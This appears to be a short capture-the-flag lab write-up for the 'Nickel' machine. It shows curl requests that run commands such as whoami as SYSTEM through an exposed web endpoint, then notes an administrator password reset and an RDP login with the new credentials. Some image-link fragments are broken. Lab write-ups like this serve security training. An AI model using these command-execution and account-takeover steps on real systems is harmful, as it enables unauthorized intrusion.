Web
Upon accessing the Infrastructure.pdf file, it was revealed that the web application on the target port 80 serves as a temporary command endpoint, with the ? character at the end of URL
┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/nickel]
└─$ curl -s 'http://192.168.219.99/?'
<!doctype html><html><body>dev-api started at 2024-08-02T13:35:17
<pre></pre>
</body></html>Nothing new when the ? character is appended
┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/nickel]
└─$ curl -s 'http://192.168.219.99/?whoami'
<!doctype html><html><body>dev-api started at 2024-08-02T13:35:17
<pre>nt authority\system
</pre>
</body></html> nt authority\system
This is what it meant by “command”
/Practice/Nickel/5-Privilege_Escalation/attachments/{245FF18A-88E1-487F-9AFA-9705DDB8DD28}.png)
Resetting the password of the administrator account to qwe123
┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/nickel]
└─$ xfreerdp /u:administrator /p:qwe123 /v:$IP /cert:ignore /dynamic-resolution /tls-seclevel:0 /Practice/Nickel/5-Privilege_Escalation/attachments/{F94B62B0-0763-4CD7-A43A-059917403796}.png)
System level compromise